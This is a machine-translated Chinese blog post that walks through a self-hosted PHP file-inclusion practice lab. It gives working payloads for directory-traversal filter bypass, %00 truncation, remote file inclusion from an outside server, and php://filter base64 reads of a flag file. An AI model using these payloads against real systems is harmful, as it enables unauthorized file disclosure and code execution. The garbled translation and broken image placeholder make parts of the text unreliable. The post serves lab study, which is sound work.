当前位置:网站首页>Day15: the file contains the vulnerability range manual (self use file include range)
Day15: the file contains the vulnerability range manual (self use file include range)
2022-07-29 08:20:00 【EdmunDJK】
DAY15: The document contains the vulnerability range clearance manual ( Self use file-include shooting range )
Pass-01、 Basics file Read
http://172.16.0.193/file-include/01/index.php?file=1.txt

analysis 1.txt The content is php Format ,phpinfo Parsing succeeded
Pass-03、 Filter …/( Path double write splicing )
Use :
.+ ../ +./ -------- As a ../
Check the last directory info.txt



Pass-04、%00 truncation
need php Version less than 5.3.8 as well as magic_quotes_gpc = Off


172.16.0.193/file-include/04/index.php?file=1.txt%00
Pass-05、 The remote file contains
php edition :5.2.17
(1) The remote include file path must be absolute
(2) Included files cannot be parsed by the server , Such as php file

172.16.0.193/file-include/05/index.php?file=http://123.56.226.153/info.txt
Pass-07、file:// Fake protocol
php edition :5.2.17
(1)file:// — Used to access the local file system
(2)php edition :5.0 above
(3) yes PHP Default encapsulation protocol used
(4) When a relative path is specified ( Don't to /、\、\\ or Windows Path starting with drive letter ) The path provided will be based on the current working directory
(5) Syntax of the agreement :php://filter:/<action>=<name>
The containing file path must be absolute
http://172.16.0.193/file-include/07/index.php?file=file:D:\phpStudy\PHPTutorial\WWW\file-include\07\flag.tx
http://172.16.0.193/file-include/07/index.php?file=php://filter/read=convert.base64-
encode/resource=flag.txt
convert.base64-encode: Transform the content of the data stream into base64 code

base64-encode: Transform the content of the data stream into base64 code
[ Outside the chain picture transfer in ...(img-s9kVOVKe-1658928781945)]
边栏推荐
- Unicode私人使用区域(Private Use Areas)
- Ga-rpn: recommended area network for guiding anchors
- Privacy is more secure in the era of digital RMB
- Beautiful girls
- 谷歌浏览器免跨域配置
- To create a thread pool for the rate, start the core thread
- Dp1332e multi protocol highly integrated contactless read-write chip
- Data warehouse layered design and data synchronization,, 220728,,,,
- 【学术相关】为什么很多国内学者的AI的论文复现不了?
- Noise monitoring and sensing system
猜你喜欢

Solve the problem of MSVC2017 compiler with yellow exclamation mark in kits component of QT

Windows 安装 MySQL 5.7详细步骤

Tle5012b+stm32f103c8t6 (bluepill) reading angle data

Gan: generate adversarial networks
![[academic related] why can't many domestic scholars' AI papers be reproduced?](/img/1a/7b162741aa7ef09538355001bf45e7.png)
[academic related] why can't many domestic scholars' AI papers be reproduced?

Temperature acquisition and control system based on WiFi

Multifunctional signal generator based on AD9850
![[beauty of software engineering - column notes] 23 | Architect: programmers who don't want to be architects are not good programmers](/img/a2/020da8a88e7c68f3dcca48208baff2.png)
[beauty of software engineering - column notes] 23 | Architect: programmers who don't want to be architects are not good programmers

MySQL rownum implementation

Deep learning (2): image and character recognition
随机推荐
Ga-rpn: recommended area network for guiding anchors
New energy shared charging pile management and operation platform
Deep learning (2): image and character recognition
AES 双向加密解密工具
Compatible with cc1101/cmt2300-dp4301 sub-1g wireless transceiver chip
Hal library learning notes - 8 concept of serial communication
ROS tutorial (Xavier)
(视频+图文)机器学习入门系列-第5章 机器学习实践
[beauty of software engineering - column notes] 29 | automated testing: how to kill bugs in the cradle?
Dp1332e multi protocol highly integrated contactless read-write chip
数字人民币时代隐私更安全
谷歌浏览器免跨域配置
[beauty of software engineering - column notes] 24 | technical debt: continue to make do with it, or overthrow it and start over?
Clion+opencv+aruco+cmake configuration
Implementation of support vector machine with ml11 sklearn
Proteus simulation based on msp430f2491 (realize water lamp)
Simplefoc parameter adjustment 3-pid parameter setting strategy
网络安全之安全基线
pnpm install出现:ERR_PNPM_PEER_DEP_ISSUES Unmet peer dependencies
Ws2812b color lamp driver based on f407zgt6